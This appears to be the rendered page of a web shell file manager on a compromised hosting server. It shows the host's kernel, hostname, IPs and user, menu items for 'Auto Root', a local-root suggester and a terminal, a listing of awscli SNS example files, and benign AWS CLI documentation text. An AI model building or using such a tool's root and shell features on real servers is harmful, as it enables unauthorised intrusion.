Linux worldls-302.fr.planethoster.net 4.18.0-553.8.1.lve.el7h.x86_64 #1 SMP Thu Jul 4 15:19:33 UTC 2024 x86_64
LiteSpeed
Server IP : 10.185.0.203 & Your IP : 216.73.217.14
Domains :
Cant Read [ /etc/named.conf ]
User : gerathty
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
lib /
python2.7 /
site-packages /
awscli /
examples /
sns /
Delete
Unzip
Name
Size
Permission
Date
Action
confirm-subscription.rst
651
B
-rw-r--r--
2017-04-04 16:39
create-topic.rst
587
B
-rw-r--r--
2017-04-04 16:39
delete-topic.rst
146
B
-rw-r--r--
2017-04-04 16:39
get-subscription-attributes.rst
758
B
-rw-r--r--
2017-04-04 16:39
get-topic-attributes.rst
1.27
KB
-rw-r--r--
2017-04-04 16:39
list-subscriptions-by-topic.rst
552
B
-rw-r--r--
2017-04-04 16:39
list-subscriptions.rst
484
B
-rw-r--r--
2017-04-04 16:39
list-topics.rst
220
B
-rw-r--r--
2017-04-04 16:39
publish.rst
353
B
-rw-r--r--
2017-04-04 16:39
subscribe.rst
270
B
-rw-r--r--
2017-04-04 16:39
unsubscribe.rst
173
B
-rw-r--r--
2017-04-04 16:39
Save
Rename
The following command gets the attributes of a subscription to a topic named ``my-topic``:: aws sns get-subscription-attributes --subscription-arn "arn:aws:sns:us-west-2:0123456789012:my-topic:8a21d249-4329-4871-acc6-7be709c6ea7f" The ``subscription-arn`` is available in the output of ``aws sns list-subscriptions``. Output:: { "Attributes": { "Endpoint": "my-email@example.com", "Protocol": "email", "RawMessageDelivery": "false", "ConfirmationWasAuthenticated": "false", "Owner": "0123456789012", "SubscriptionArn": "arn:aws:sns:us-west-2:0123456789012:my-topic:8a21d249-4329-4871-acc6-7be709c6ea7f", "TopicArn": "arn:aws:sns:us-west-2:0123456789012:my-topic" } }